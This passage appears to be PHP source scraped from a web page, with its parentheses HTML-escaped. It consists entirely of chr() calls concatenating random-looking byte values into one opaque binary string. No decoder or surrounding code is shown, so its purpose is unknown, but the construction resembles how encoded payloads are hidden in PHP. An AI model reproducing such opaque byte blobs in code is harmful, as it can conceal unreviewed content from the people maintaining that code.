       chr&#40;25&#41;. chr&#40;190&#41;.chr&#40;224&#41;.chr&#40;231&#41;.chr&#40;90&#41;. chr&#40;172&#41;.chr&#40;62&#41;. chr&#40;4&#41;.
       chr&#40;43&#41;. chr&#40;198&#41;.chr&#40;61&#41;. chr&#40;121&#41;.chr&#40;147&#41;.chr&#40;25&#41;. chr&#40;160&#41;.chr&#40;103&#41;.
       chr&#40;13&#41;. chr&#40;164&#41;.chr&#40;14&#41;. chr&#40;205&#41;.chr&#40;221&#41;.chr&#40;252&#41;.chr&#40;156&#41;.chr&#40;73&#41;.
       chr&#40;1&#41;.  chr&#40;86&#41;. chr&#40;168&#41;.chr&#40;79&#41;. chr&#40;55&#41;. chr&#40;172&#41;.chr&#40;151&#41;.chr&#40;225&#41;.
       chr&#40;111&#41;.chr&#40;218&#41;.chr&#40;238&#41;.chr&#40;104&#41;.chr&#40;60&#41;. chr&#40;66&#41;. chr&#40;43&#41;. chr&#40;194&#41;.
       chr&#40;254&#41;.chr&#40;126&#41;.chr&#40;40&#41;. chr&#40;69&#41;. chr&#40;240&#41;.chr&#40;84&#41;. chr&#40;228&#41;.chr&#40;100&#41;.
       chr&#40;22&#41;. chr&#40;138&#41;.chr&#40;13&#41;. chr&#40;9&#41;.  chr&#40;36&#41;. chr&#40;240&#41;.chr&#40;149&#41;.chr&#40;24&#41;.
       chr&#40;60&#41;. chr&#40;147&#41;.chr&#40;100&#41;.chr&#40;224&#41;.chr&#40;82&#41;. chr&#40;19&#41;. chr&#40;130&#41;.chr&#40;147&#41;.
       chr&#40;3&#41;.  chr&#40;235&#41;.chr&#40;161&#41;.chr&#40;12&#41;. chr&#40;183&#41;.chr&#40;119&#41;.chr&#40;207&#41;.chr&#40;234&#41;.
       chr&#40;152&#41;.chr&#40;23&#41;. chr&#40;39&#41;. chr&#40;153&#41;.chr&#40;6&#41;.  chr&#40;196&#41;.chr&#40;151&#41;.chr&#40;150&#41;.
       chr&#40;112&#41;.chr&#40;60&#41;. chr&#40;220&#41;.chr&#40;72&#41;. chr&#40;6&#41;.  chr&#40;74&#41;. chr&#40;200&#41;.chr&#40;21&#41;.
       chr&#40;112&#41;.chr&#40;129&#41;.chr&#40;17&#41;. chr&#40;36&#41;. chr&#40;103&#41;.chr&#40;240&#41;.chr&#40;189&#41;.chr&#40;157&#41;.
       chr&#40;239&#41;.chr&#40;80&#41;. chr&#40;206&#41;.chr&#40;241&#41;.chr&#40;54&#41;. chr&#40;88&#41;. chr&#40;204&#41;.chr&#40;145&#41;.
       chr&#40;230&#41;.chr&#40;233&#41;.chr&#40;122&#41;.chr&#40;105&#41;.chr&#40;237&#41;.chr&#40;189&#41;.chr&#40;12&#41;. chr&#40;115&#41;.
       chr&#40;172&#41;.chr&#40;132&#41;.chr&#40;166&#41;.chr&#40;194&#41;.chr&#40;63&#41;. chr&#40;76&#41;. chr&#40;74&#41;. chr&#40;45&#41;.
       chr&#40;135&#41;.chr&#40;176&#41;.chr&#40;14&#41;. chr&#40;49&#41;. chr&#40;117&#41;.chr&#40;176&#41;.chr&#40;171&#41;.chr&#40;7&#41;.
       chr&#40;17&#41;. chr&#40;62&#41;. chr&#40;204&#41;.chr&#40;179&#41;.chr&#40;110&#41;.chr&#40;7&#41;.  chr&#40;235&#41;.chr&#40;20&#41;.
       chr&#40;213&#41;.chr&#40;67&#41;. chr&#40;67&#41;. chr&#40;173&#41;.chr&#40;161&#41;.chr&#40;107&#41;.chr&#40;97&#41;. chr&#40;107&#41;.
       chr&#40;206&#41;.chr&#40;15&#41;. chr&#40;20&#41;. chr&#40;197&#41;.chr&#40;180&#41;.chr&#40;113&#41;.chr&#40;50&#41;. chr&#40;203&#41;.
       chr&#40;122&#41;.chr&#40;153&#41;.chr&#40;14&#41;. chr&#40;141&#41;.chr&#40;89&#41;. chr&#40;97&#41;. chr&#40;50&#41;. chr&#40;147&#41;.
       chr&#40;212&#41;.chr&#40;193&#41;.chr&#40;183&#41;.chr&#40;132&#41;.chr&#40;239&#41;.chr&#40;80&#41;. chr&#40;41&#41;. chr&#40;195&#41;.
       chr&#40;107&#41;.chr&#40;192&#41;.chr&#40;16&#41;. chr&#40;31&#41;. chr&#40;57&#41;. chr&#40;62&#41;. chr&#40;32&#41;. chr&#40;226&#41;.
       chr&#40;202&#41;.chr&#40;92&#41;. chr&#40;177&#41;.chr&#40;54&#41;. chr&#40;82&#41;. chr&#40;45&#41;. chr&#40;50&#41;. chr&#40;182&#41;.
       chr&#40;205&#41;.chr&#40;194&#41;.chr&#40;16&#41;. chr&#40;212&#41;.chr&#40;235&#41;.chr&#40;169&#41;.chr&#40;195&#41;.chr&#40;176&#41;.
       chr&#40;229&#41;.chr&#40;22&#41;. chr&#40;112&#41;.chr&#40;145&#41;.chr&#40;196&#41;.chr&#40;44&#41;. chr&#40;184&#41;.chr&#40;172&#41;.
       chr&#40;65&#41;. chr&#40;222&#41;.chr&#40;124&#41;.chr&#40;123&#41;.chr&#40;236&#41;.chr&#40;78&#41;. chr&#40;101&#41;.chr&#40;248&#41;.
       chr&#40;178&#41;.chr&#40;193&#41;.chr&#40;251&#41;.chr&#40;206&#41;.chr&#40;154&#41;.chr&#40;152&#41;.chr&#40;149&#41;.chr&#40;160&#41;.
       chr&#40;105&#41;.chr&#40;213&#41;.chr&#40;153&#41;.chr&#40;175&#41;.chr&#40;240&#41;.chr&#40;91&#41;. chr&#40;160&#41;.chr&#40;38&#41;.
       chr&#40;77&#41;. chr&#40;228&#41;.chr&#40;192&#41;.chr&#40;53&#41;. chr&#40;184&#41;.chr&#40;44&#41;. chr&#40;194&#41;.chr&#40;154&#41;.
       chr&#40;2&#41;.  chr&#40;78&#41;. chr&#40;209&#41;.chr&#40;210&#41;.chr&#40;3&#41;.  chr&#40;245&#41;.chr&#40;88&#41;. chr&#40;234&#41;.
       chr&#40;144&#41;.chr&#40;152&#41;.chr&#40;85&#41;. chr&#40;47&#41;. chr&#40;229&#41;.chr&#40;227&#41;.chr&#40;80&#41;. chr&#40;239&#41;.
       chr&#40;81&#41;. chr&#40;185&#41;.chr&#40;190&#41;.chr&#40;73&#41;. chr&#40;76&#41;. chr&#40;16&#41;. chr&#40;232&#41;.chr&#40;217&#41;.
       chr&#40;53&#41;. chr&#40;103&#41;.chr&#40;242&#41;.chr&#40;60&#41;. chr&#40;107&#41;.chr&#40;172&#41;.chr&#40;172&#41;.chr&#40;1&#41;.
       chr&#40;38&#41;. chr&#40;129&#41;.chr&#40;89&#41;. chr&#40;17&#41;. chr&#40;154&#41;.chr&#40;152&#41;.chr&#40;164&#41;.chr&#40;58&#41;.
       chr&#40;120&#41;.chr&#40;240&#41;.chr&#40;128&#41;.chr&#40;232&#41;.chr&#40;239&#41;.chr&#40;171&#41;.chr&#40;204&#41;.chr&#40;74&#41;.
       chr&#40;233&#41;.chr&#40;129&#41;.chr&#40;175&#41;.chr&#40;207&#41;.chr&#40;58&#41;. chr&#40;109&#41;.chr&#40;41&#41;. chr&#40;219&#41;.
       chr&#40;130&#41;.chr&#40;51&#41;. chr&#40;204&#41;.chr&#40;193&#41;.chr&#40;6&#41;.  chr&#40;179&#41;.chr&#40;58&#41;. chr&#40;32&#41;.
       chr&#40;45&#41;. chr&#40;172&#41;.chr&#40;121&#41;.chr&#40;160&#41;.chr&#40;97&#41;. chr&#40;120&#41;.chr&#40;70&#41;. chr&#40;208&#41;.
       chr&#40;220&#41;.chr&#40;81&#41;. chr&#40;201&#41;.chr&#40;44&#41;. chr&#40;88&#41;. chr&#40;76&#41;. chr&#40;94&#41;. chr&#40;222&#41;.
       chr&#40;188&#41;.chr&#40;32&#41;. chr&#40;198&#41;.chr&#40;236&#41;.chr&#40;222&#41;.chr&#40;7&#41;.  chr&#40;88&#41;. chr&#40;240&#41;.
       chr&#40;113&#41;.chr&#40;154&#41;.chr&#40;184&#41;.chr&#40;135&#41;.chr&#40;13&#41;. chr&#40;50&#41;. chr&#40;114&#41;.chr&#40;90&#41;.
       chr&#40;47&#41;. chr&#40;214&#41;.chr&#40;150&#41;.chr&#40;177&#41;.chr&#40;107&#41;.chr&#40;253&#41;.chr&#40;167&#41;.chr&#40;59&#41;.
       chr&#40;76&#41;. chr&#40;109&#41;.chr&#40;145&#41;.chr&#40;47&#41;. chr&#40;43&#41;. chr&#40;102&#41;.chr&#40;37&#41;. chr&#40;69&#41;.
       chr&#40;74&#41;. chr&#40;170&#41;.chr&#40;220&#41;.chr&#40;98&#41;. chr&#40;214&#41;.chr&#40;50&#41;. chr&#40;102&#41;.chr&#40;93&#41;.
       chr&#40;188&#41;.chr&#40;174&#41;.chr&#40;206&#41;.chr&#40;208&#41;.chr&#40;120&#41;.chr&#40;226&#41;.chr&#40;111&#41;.chr&#40;42&#41;.
       chr&#40;158&#41;.chr&#40;89&#41;. chr&#40;231&#41;.chr&#40;97&#41;. chr&#40;67&#41;. chr&#40;148&#41;.chr&#40;196&#41;.chr&#40;8&#41;.
       chr&#40;121&#41;.chr&#40;224&#41;.chr&#40;170&#41;.chr&#40;91&#41;. chr&#40;68&#41;. chr&#40;103&#41;.chr&#40;76&#41;. chr&#40;161&#41;.
       chr&#40;2&#41;.  chr&#40;205&#41;.chr&#40;230&#41;.chr&#40;72&#41;. chr&#40;153&#41;.chr&#40;21&#41;. chr&#40;23&#41;. chr&#40;151&#41;.
       chr&#40;121&#41;.chr&#40;116&#41;.chr&#40;159&#41;.chr&#40;89&#41;. chr&#40;57&#41;. chr&#40;124&#41;.chr&#40;134&#41;.chr&#40;30&#41;.
       chr&#40;7&#41;.  chr&#40;104&#41;.chr&#40;216&#41;.chr&#40;176&#41;.chr&#40;65&#41;. chr&#40;123&#41;.chr&#40;150&#41;.chr&#40;199&#41;.
       chr&#40;251&#41;.chr&#40;28&#41;. chr&#40;214&#41;.chr&#40;235&#41;.chr&#40;16&#41;. chr&#40;55&#41;. chr&#40;210&#41;.chr&#40;0&#41;.
       chr&#40;16&#41;. chr&#40;90&#41;. chr&#40;22&#41;. chr&#40;122&#41;.chr&#40;22&#41;. chr&#40;178&#41;.chr&#40;194&#41;.chr&#40;243&#41;.
       chr&#40;75&#41;. chr&#40;18&#41;. chr&#40;130&#41;.chr&#40;173&#41;.chr&#40;60&#41;. chr&#40;67&#41;. chr&#40;102&#41;.chr&#40;189&#41;.
       chr&#40;18&#41;. chr&#40;134&#41;.chr&#40;0&#41;.  chr&#40;27&#41;. chr&#40;18&#41;. chr&#40;160&#41;.chr&#40;9&#41;.  chr&#40;62&#41;.
       chr&#40;154&#41;.chr&#40;220&#41;.chr&#40;205&#41;.chr&#40;223&#41;.chr&#40;31&#41;. chr&#40;20&#41;. chr&#40;218&#41;.chr&#40;156&#41;.
       chr&#40;24&#41;. chr&#40;30&#41;. chr&#40;136&#41;.chr&#40;81&#41;. chr&#40;35&#41;. chr&#40;138&#41;.chr&#40;28&#41;. chr&#40;85&#41;.
       chr&#40;210&#41;.chr&#40;177&#41;.chr&#40;243&#41;.chr&#40;139&#41;.chr&#40;117&#41;.chr&#40;103&#41;.chr&#40;243&#41;.chr&#40;12&#41;.
       chr&#40;254&#41;.chr&#40;59&#41;. chr&#40;204&#41;.chr&#40;210&#41;.chr&#40;26&#41;. chr&#40;167&#41;.chr&#40;107&#41;.chr&#40;192&#41;.
       chr&#40;88&#41;. chr&#40;175&#41;.chr&#40;222&#41;.chr&#40;145&#41;.chr&#40;122&#41;.chr&#40;141&#41;.chr&#40;74&#41;. chr&#40;115&#41;.
       chr&#40;164&#41;.chr&#40;115&#41;.chr&#40;140&#41;.chr&#40;107&#41;.chr&#40;42&#41;. chr&#40;167&#41;.chr&#40;193&#41;.chr&#40;215&#41;.
       chr&#40;4&#41;.  chr&#40;1&#41;.  chr&#40;116&#41;.chr&#40;90&#41;. chr&#40;174&#41;.chr&#40;117&#41;.chr&#40;252&#41;.chr&#40;18&#41;.
       chr&#40;113&#41;.chr&#40;85&#41;. chr&#40;214&#41;.chr&#40;41&#41;. chr&#40;249&#41;.chr&#40;231&#41;.chr&#40;27&#41;. chr&#40;204&#41;.
       chr&#40;2&#41;.  chr&#40;139&#41;.chr&#40;89&#41;. chr&#40;36&#41;. chr&#40;11&#41;. chr&#40;233&#41;.chr&#40;169&#41;.chr&#40;132&#41;.
       chr&#40;104&#41;.chr&#40;51&#41;. chr&#40;120&#41;.chr&#40;112&#41;.chr&#40;60&#41;. chr&#40;4&#41;.  chr&#40;65&#41;. chr&#40;147&#41;.
       chr&#40;84&#41;. chr&#40;155&#41;.chr&#40;228&#41;.chr&#40;189&#41;.chr&#40;225&#41;.chr&#40;121&#41;.chr&#40;228&#41;.chr&#40;180&#41;.
       chr&#40;41&#41;. chr&#40;110&#41;.chr&#40;125&#41;.chr&#40;17&#41;. chr&#40;32&#41;. chr&#40;174&#41;.chr&#40;187&#41;.chr&#40;221&#41;.
       chr&#40;189&#41;.chr&#40;33&#41;. chr&#40;225&#41;.chr&#40;26&#41;. chr&#40;105&#41;.chr&#40;4&#41;.  chr&#40;177&#41;.chr&#40;226&#41;.
       chr&#40;81&#41;. chr&#40;108&#41;.chr&#40;237&#41;.chr&#40;161&#41;.chr&#40;84&#41;. chr&#40;111&#41;.chr&#40;106&#41;.chr&#40;65&#41;.
       chr&#40;191&#41;.chr&#40;40&#41;. chr&#40;216&#41;.chr&#40;179&#41;.chr&#40;145&#41;.chr&#40;130&#41;.chr&#40;12&#41;. chr&#40;165&#41;.
       chr&#40;146&#41;.chr&#40;33&#41;. chr&#40;26&#41;. chr&#40;60&#41;. chr&#40;232&#41;.chr&#40;171&#41;.chr&#40;18&#41;. chr&#40;32&#41;.
       chr&#40;35&#41;. chr&#40;80&#41;. chr&#40;109&#41;.chr&#40;87&#41;. chr&#40;43&#41;. chr&#40;252&#41;.chr&#40;166&#41;.chr&#40;49&#41;.
       chr&#40;231&#41;.chr&#40;209&#41;.chr&#40;8&#41;.  chr&#40;142&#41;.chr&#40;169&#41;.chr&#40;162&#41;.chr&#40;234&#41;.chr&#40;131&#41;.
       chr&#40;24&#41;. chr&#40;45&#41;. chr&#40;131&#41;.chr&#40;7&#41;.  chr&#40;49&#41;. chr&#40;218&#41;.chr&#40;109&#41;.chr&#40;177&#41;.
       chr&#40;203&#41;.chr&#40;144&#41;.chr&#40;249&#41;.chr&#40;116&#41;.chr&#40;198&#41;.chr&#40;136&#41;.chr&#40;56&#41;. chr&#40;20&#41;.
       chr&#40;19&#41;. chr&#40;32&#41;. chr&#40;199&#41;.chr&#40;83&#41;. chr&#40;200&#41;.chr&#40;217&#41;.chr&#40;123&#41;.chr&#40;6&#41;.
       chr&#40;47&#41;. chr&#40;34&#41;. chr&#40;49&#41;. chr&#40;99&#41;. chr&#40;72&#41;. chr&#40;152&#41;.chr&#40;2&#41;.  chr&#40;167&#41;.
       chr&#40;58&#41;. chr&#40;72&#41;. chr&#40;40&#41;. chr&#40;198&#41;.chr&#40;200&#41;.chr&#40;56&#41;. chr&#40;149&#41;.chr&#40;19&#41;.
       chr&#40;188&#41;.chr&#40;36&#41;. chr&#40;67&#41;. chr&#40;167&#41;.chr&#40;177&#41;.chr&#40;62&#41;. chr&#40;78&#41;. chr&#40;233&#41;.
       chr&#40;226&#41;.chr&#40;141&#41;.chr&#40;162&#41;.chr&#40;194&#41;.chr&#40;177&#41;.chr&#40;146&#41;.chr&#40;5&#41;.  chr&#40;92&#41;.
       chr&#40;95&#41;. chr&#40;55&#41;. chr&#40;120&#41;.chr&#40;216&#41;.chr&#40;203&#41;.chr&#40;24&#41;. chr&#40;80&#41;. chr&#40;205&#41;.
       chr&#40;227&#41;.chr&#40;170&#41;.chr&#40;131&#41;.chr&#40;41&#41;. chr&#40;225&#41;.chr&#40;190&#41;.chr&#40;217&#41;.chr&#40;166&#41;.
       chr&#40;50&#41;. chr&#40;148&#41;.chr&#40;86&#41;. chr&#40;229&#41;.chr&#40;71&#41;. chr&#40;11&#41;. chr&#40;25&#41;. chr&#40;178&#41;.
       chr&#40;62&#41;. chr&#40;220&#41;.chr&#40;203&#41;.chr&#40;202&#41;.chr&#40;101&#41;.chr&#40;61&#41;. chr&#40;15&#41;. chr&#40;42&#41;.
       chr&#40;76&#41;. chr&#40;135&#41;.chr&#40;160&#41;.chr&#40;187&#41;.chr&#40;27&#41;. chr&#40;88&#41;. chr&#40;41&#41;. chr&#40;147&#41;.
       chr&#40;225&#41;.chr&#40;5&#41;.  chr&#40;148&#41;.chr&#40;39&#41;. chr&#40;148&#41;.chr&#40;136&#41;.chr&#40;158&#41;.chr&#40;18&#41;.
       chr&#40;197&#41;.chr&#40;55&#41;. chr&#40;134&#41;.chr&#40;112&#41;.chr&#40;185&#41;.chr&#40;85&#41;. chr&#40;229&#41;.chr&#40;48&#41;.
       chr&#40;22&#41;. chr&#40;193&#41;.chr&#40;232&#41;.chr&#40;183&#41;.chr&#40;200&#41;.chr&#40;176&#41;.chr&#40;211&#41;.chr&#40;68&#41;.
       chr&#40;83&#41;. chr&#40;75&#41;. chr&#40;42&#41;. chr&#40;195&#41;.chr&#40;145&#41;.chr&#40;103&#41;.chr&#40;104&#41;.chr&#40;108&#41;.
       chr&#40;171&#41;.chr&#40;138&#41;.chr&#40;169&#41;.chr&#40;67&#41;. chr&#40;152&#41;.chr&#40;63&#41;. chr&#40;161&#41;.chr&#40;146&#41;.
       chr&#40;176&#41;.chr&#40;162&#41;.chr&#40;154&#41;.chr&#40;65&#41;. chr&#40;177&#41;.chr&#40;39&#41;. chr&#40;173&#41;.chr&#40;126&#41;.
       chr&#40;95&#41;. chr&#40;134&#41;.chr&#40;17&#41;. chr&#40;53&#41;. chr&#40;124&#41;.chr&#40;245&#41;.chr&#40;119&#41;.chr&#40;67&#41;.
       chr&#40;160&#41;.chr&#40;86&#41;. chr&#40;11&#41;. chr&#40;206&#41;.chr&#40;5&#41;.  chr&#40;44&#41;. chr&#40;235&#41;.chr&#40;229&#41;.
       chr&#40;45&#41;. chr&#40;166&#41;.chr&#40;14&#41;. chr&#40;182&#41;.chr&#40;4&#41;.  chr&#40;2&#41;.  chr&#40;19&#41;. chr&#40;23&#41;.
       chr&#40;163&#41;.chr&#40;235&#41;.chr&#40;205&#41;.chr&#40;172&#41;.chr&#40;234&#41;.chr&#40;115&#41;.chr&#40;56&#41;. chr&#40;230&#41;.
       chr&#40;225&#41;.chr&#40;147&#41;.chr&#40;238&#41;.chr&#40;148&#41;.chr&#40;85&#41;. chr&#40;73&#41;. chr&#40;118&#41;.chr&#40;174&#41;.
       chr&#40;36&#41;. chr&#40;64&#41;. chr&#40;185&#41;.chr&#40;208&#41;.chr&#40;1&#41;.  chr&#40;104&#41;.chr&#40;228&#41;.chr&#40;146&#41;.
       chr&#40;99&#41;. chr&#40;255&#41;.chr&#40;70&#41;. chr&#40;92&#41;. chr&#40;158&#41;.chr&#40;37&#41;. chr&#40;1&#41;.  chr&#40;38&#41;.
       chr&#40;155&#41;.chr&#40;4&#41;.  chr&#40;206&#41;.chr&#40;200&#41;.chr&#40;159&#41;.chr&#40;149&#41;.chr&#40;179&#41;.chr&#40;173&#41;.
       chr&#40;219&#41;.chr&#40;172&#41;.chr&#40;90&#41;. chr&#40;220&#41;.chr&#40;139&#41;.chr&#40;226&#41;.chr&#40;209&#41;.chr&#40;3&#41;.
       chr&#40;168&#41;.chr&#40;47&#41;. chr&#40;26&#41;. chr&#40;21&#41;. chr&#40;244&#41;.chr&#40;242&#41;.chr&#40;144&#41;.chr&#40;141&#41;.
       chr&#40;54&#41;. chr&#40;165&#41;.chr&#40;103&#41;.chr&#40;141&#41;.chr&#40;111&#41;.chr&#40;193&#41;.chr&#40;177&#41;.chr&#40;68&#41;.
       chr&#40;138&#41;.chr&#40;122&#41;.chr&#40;86&#41;. chr&#40;152&#41;.chr&#40;91&#41;. chr&#40;110&#41;.chr&#40;176&#41;.chr&#40;225&#41;.
       chr&#40;89&#41;. chr&#40;188&#41;.chr&#40;108&#41;.chr&#40;1&#41;.  chr&#40;97&#41;. chr&#40;121&#41;.chr&#40;239&#41;.chr&#40;123&#41;.
       chr&#40;146&#41;.chr&#40;58&#41;. chr&#40;176&#41;.chr&#40;12&#41;. chr&#40;190&#41;.chr&#40;39&#41;. chr&#40;13&#41;. chr&#40;226&#41;.
       chr&#40;32&#41;. chr&#40;59&#41;. chr&#40;47&#41;. chr&#40;123&#41;.chr&#40;140&#41;.chr&#40;25&#41;. chr&#40;54&#41;. chr&#40;50&#41;.
       chr&#40;89&#41;. chr&#40;246&#41;.chr&#40;112&#41;.chr&#40;56&#41;. chr&#40;76&#41;. chr&#40;102&#41;.chr&#40;177&#41;.chr&#40;184&#41;.
       chr&#40;149&#41;.chr&#40;103&#41;.chr&#40;205&#41;.chr&#40;123&#41;.chr&#40;179&#41;.chr&#40;241&#41;.chr&#40;98&#41;. chr&#40;151&#41;.
       chr&#40;185&#41;.chr&#40;103&#41;.chr&#40;133&#41;.chr&#40;43&#41;. chr&#40;121&#41;.chr&#40;207&#41;.chr&#40;138&#41;.chr&#40;101&#41;.
       chr&#40;0&#41;.  chr&#40;89&#41;. chr&#40;166&#41;.chr&#40;152&#41;.chr&#40;246&#41;.chr&#40;164&#41;.chr&#40;52&#41;. chr&#40;207&#41;.
       chr&#40;61&#41;. chr&#40;59&#41;. chr&#40;111&#41;.chr&#40;154&#41;.chr&#40;237&#41;.chr&#40;140&#41;.chr&#40;40&#41;. chr&#40;51&#41;.
       chr&#40;207&#41;.chr&#40;122&#41;.chr&#40;57&#41;. chr&#40;156&#41;.chr&#40;243&#41;.chr&#40;144&#41;.chr&#40;115&#41;.chr&#40;108&#41;.
       chr&#40;229&#41;.chr&#40;41&#41;. chr&#40;195&#41;.chr&#40;202&#41;.chr&#40;122&#41;.chr&#40;243&#41;.chr&#40;134&#41;.chr&#40;6&#41;.
       chr&#40;216&#41;.chr&#40;191&#41;.chr&#40;27&#41;. chr&#40;199&#41;.chr&#40;98&#41;. chr&#40;129&#41;.chr&#40;19&#41;. chr&#40;231&#41;.
       chr&#40;34&#41;. chr&#40;115&#41;.chr&#40;222&#41;.chr&#40;194&#41;.chr&#40;232&#41;.chr&#40;117&#41;.chr&#40;244&#41;.chr&#40;112&#41;.
       chr&#40;182&#41;.chr&#40;225&#41;.chr&#40;150&#41;.chr&#40;143&#41;.chr&#40;39&#41;. chr&#40;228&#41;.chr&#40;28&#41;. chr&#40;202&#41;.
       chr&#40;26&#41;. chr&#40;81&#41;. chr&#40;31&#41;. chr&#40;12&#41;. chr&#40;115&#41;.chr&#40;26&#41;. chr&#40;60&#41;. chr&#40;40&#41;.
       chr&#40;208&#41;.chr&#40;247&#41;.chr&#40;95&#41;. chr&#40;1&#41;.  chr&#40;83&#41;. chr&#40;156&#41;.chr&#40;237&#41;.chr&#40;244&#41;.
       chr&#40;216&#41;.chr&#40;239&#41;.chr&#40;87&#41;. chr&#40;69&#41;. chr&#40;249&#41;.chr&#40;108&#41;.chr&#40;121&#41;.chr&#40;165&#41;.
       chr&#40;70&#41;. chr&#40;17&#41;. chr&#40;110&#41;.chr&#40;240&#41;.chr&#40;126&#41;.chr&#40;8&#41;.  chr&#40;141&#41;.chr&#40;71&#41;.
       chr&#40;221&#41;.chr&#40;224&#41;.chr&#40;233&#41;.chr&#40;181&#41;.chr&#40;18&#41;. chr&#40;124&#41;.chr&#40;149&#41;.chr&#40;121&#41;.
       chr&#40;197&#41;.chr&#40;210&#41;.chr&#40;111&#41;.chr&#40;139&#41;.chr&#40;110&#41;.chr&#40;51&#41;. chr&#40;28&#41;. chr&#40;102&#41;.
       chr&#40;5&#41;.  chr&#40;128&#41;.chr&#40;81&#41;. chr&#40;146&#41;.chr&#40;218&#41;.chr&#40;8&#41;.  chr&#40;35&#41;. chr&#40;93&#41;.
       chr&#40;163&#41;.chr&#40;227&#41;.chr&#40;1&#41;.  chr&#40;77&#41;. chr&#40;120&#41;.chr&#40;243&#41;.chr&#40;159&#41;.chr&#40;201&#41;.
       chr&#40;31&#41;. chr&#40;72&#41;. chr&#40;138&#41;.chr&#40;228&#41;.chr&#40;42&#41;. chr&#40;226&#41;.chr&#40;192&#41;.chr&#40;78&#41;.
       chr&#40;152&#41;.chr&#40;76&#41;. chr&#40;133&#41;.chr&#40;211&#41;.chr&#40;8&#41;.  chr&#40;29&#41;. chr&#40;14&#41;. chr&#40;94&#41;.
       chr&#40;159&#41;.chr&#40;139&#41;.chr&#40;94&#41;. chr&#40;17&#41;. chr&#40;210&#41;.chr&#40;231&#41;.chr&#40;188&#41;.chr&#40;91&#41;.
       chr&#40;163&#41;.chr&#40;116&#41;.chr&#40;99&#41;. chr&#40;164&#41;.chr&#40;124&#41;.chr&#40;31&#41;. chr&#40;140&#41;.chr&#40;27&#41;.
       chr&#40;73&#41;. chr&#40;63&#41;. chr&#40;56&#41;. chr&#40;130&#41;.chr&#40;117&#41;.chr&#40;107&#41;.chr&#40;41&#41;. chr&#40;143&#41;.
       chr&#40;82&#41;. chr&#40;135&#41;.chr&#40;47&#41;. chr&#40;198&#41;.chr&#40;147&#41;.chr&#40;212&#41;.chr&#40;225&#41;.chr&#40;206&#41;.
       chr&#40;224&#41;.chr&#40;150&#41;.chr&#40;103&#41;.chr&#40;109&#41;.chr&#40;207&#41;.chr&#40;228&#41;.chr&#40;251&#41;.chr&#40;177&#41;.
       chr&#40;188&#41;.chr&#40;212&#41;.chr&#40;83&#41;. chr&#40;38&#41;. chr&#40;109&#41;.chr&#40;92&#41;. chr&#40;117&#41;.chr&#40;53&#41;.
       chr&#40;180&#41;.chr&#40;7&#41;.  chr&#40;139&#41;.chr&#40;222&#41;.chr&#40;22&#41;. chr&#40;95&#41;. chr&#40;153&#41;.chr&#40;199&#41;.
       chr&#40;247&#41;.chr&#40;130&#41;.chr&#40;231&#41;.chr&#40;85&#41;. chr&#40;31&#41;. chr&#40;14&#41;. chr&#40;167&#41;.chr&#40;244&#41;.
       chr&#40;108&#41;.chr&#40;143&#41;.chr&#40;89&#41;. chr&#40;15&#41;. chr&#40;47&#41;. chr&#40;249&#41;.chr&#40;36&#41;. chr&#40;62&#41;.
       chr&#40;94&#41;. chr&#40;239&#41;.chr&#40;203&#41;.chr&#40;224&#41;.chr&#40;97&#41;. chr&#40;216&#41;.chr&#40;118&#41;.chr&#40;231&#41;.
       chr&#40;118&#41;.chr&#40;244&#41;.chr&#40;27&#41;. chr&#40;205&#41;.chr&#40;47&#41;. chr&#40;201&#41;.chr&#40;22&#41;. chr&#40;182&#41;.
       chr&#40;2&#41;.  chr&#40;152&#41;.chr&#40;114&#41;.chr&#40;19&#41;. chr&#40;200&#41;.chr&#40;38&#41;. chr&#40;153&#41;.chr&#40;89&#41;.
       chr&#40;239&#41;.chr&#40;174&#41;.chr&#40;127&#41;.chr&#40;76&#41;. chr&#40;232&#41;.chr&#40;231&#41;.chr&#40;1&#41;.  chr&#40;125&#41;.
       chr&#40;133&#41;.chr&#40;84&#41;. chr&#40;97&#41;. chr&#40;144&#41;.chr&#40;3&#41;.  chr&#40;10&#41;. chr&#40;103&#41;.chr&#40;43&#41;.
       chr&#40;250&#41;.chr&#40;239&#41;.chr&#40;145&#41;.chr&#40;232&#41;.chr&#40;126&#41;.chr&#40;76&#41;. chr&#40;241&#41;.chr&#40;85&#41;.
       chr&#40;17&#41;. chr&#40;57&#41;. chr&#40;244&#41;.chr&#40;49&#41;. chr&#40;4&#41;.  chr&#40;29&#41;. chr&#40;63&#41;. chr&#40;134&#41;.
       chr&#40;227&#41;.chr&#40;111&#41;.chr&#40;165&#41;.chr&#40;212&#41;.chr&#40;19&#41;. chr&#40;1&#41;.  chr&#40;90&#41;. chr&#40;120&#41;.
       chr&#40;25&#41;. chr&#40;118&#41;.chr&#40;228&#41;.chr&#40;224&#41;.chr&#40;85&#41;. chr&#40;112&#41;.chr&#40;193&#41;.chr&#40;79&#41;.
       chr&#40;144&#41;.chr&#40;197&#41;.chr&#40;249&#41;.chr&#40;173&#41;.chr&#40;54&#41;. chr&#40;157&#41;.chr&#40;79&#41;. chr&#40;66&#41;.
       chr&#40;39&#41;. chr&#40;103&#41;.chr&#40;15&#41;. chr&#40;134&#41;.chr&#40;241&#41;.chr&#40;207&#41;.chr&#40;184&#41;.chr&#40;114&#41;.
       chr&#40;82&#41;. chr&#40;74&#41;. chr&#40;37&#41;. chr&#40;230&#41;.chr&#40;10&#41;. chr&#40;9&#41;.  chr&#40;72&#41;. chr&#40;4&#41;.
       chr&#40;199&#41;.chr&#40;60&#41;. chr&#40;200&#41;.chr&#40;116&#41;.chr&#40;90&#41;. chr&#40;187&#41;.chr&#40;237&#41;.chr&#40;111&#41;.
       chr&#40;13&#41;. chr&#40;184&#41;.chr&#40;209&#41;.chr&#40;146&#41;.chr&#40;53&#41;. chr&#40;79&#41;. chr&#40;101&#41;.chr&#40;185&#41;.
       chr&#40;145&#41;.chr&#40;34&#41;. chr&#40;179&#41;.chr&#40;84&#41;. chr&#40;116&#41;.chr&#40;231&#41;.chr&#40;199&#41;.chr&#40;189&#41;.
       chr&#40;28&#41;. chr&#40;36&#41;. chr&#40;113&#41;.chr&#40;84&#41;. chr&#40;132&#41;.chr&#40;6&#41;.  chr&#40;11&#41;. chr&#40;100&#41;.
       chr&#40;242&#41;.chr&#40;156&#41;.chr&#40;158&#41;.chr&#40;38&#41;. chr&#40;165&#41;.chr&#40;11&#41;. chr&#40;196&#41;.chr&#40;202&#41;.
       chr&#40;103&#41;.chr&#40;12&#41;. chr&#40;91&#41;. chr&#40;88&#41;. chr&#40;95&#41;. chr&#40;189&#41;.chr&#40;157&#41;.chr&#40;12&#41;.
